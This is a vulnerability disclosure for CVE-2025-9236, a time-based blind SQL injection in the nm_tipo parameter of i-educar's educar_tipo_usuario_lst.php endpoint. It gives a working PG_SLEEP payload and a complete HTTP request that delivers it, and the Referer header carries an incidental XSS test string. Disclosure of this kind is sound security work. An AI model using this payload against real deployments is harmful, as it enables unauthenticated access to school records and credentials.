CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in nm_tipo Parameter on educar_tipo_usuario_lst.php Endpoint
CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9236
Summary
A SQL Injection vulnerability was discovered in the nm_tipo parameter of the educar_tipo_usuario_lst.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.
Details
The application fails to properly sanitize user-supplied input in the nm_tipo parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.
PoC
Vulnerable Endpoint: educar_tipo_usuario_lst.php
Parameter: nm_tipo
Payload:
1
| ' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ
|
Example Request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ&descricao=1&nivel=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&descricao=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&nivel=-1
Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
|
This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.
Observe the time delay in the server response, indicating the successful execution of the SQL payload.
Impact
- Unauthorized access to sensitive data (e.g., users, passwords, logs).
- Database enumeration (schemas, tables, users, versions).
- Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
- Full compromise of the application if chained with other vulnerabilities.
- This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.
Reference
https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md
Finder
Marcelo Queiroz
By: CVE-Hunters
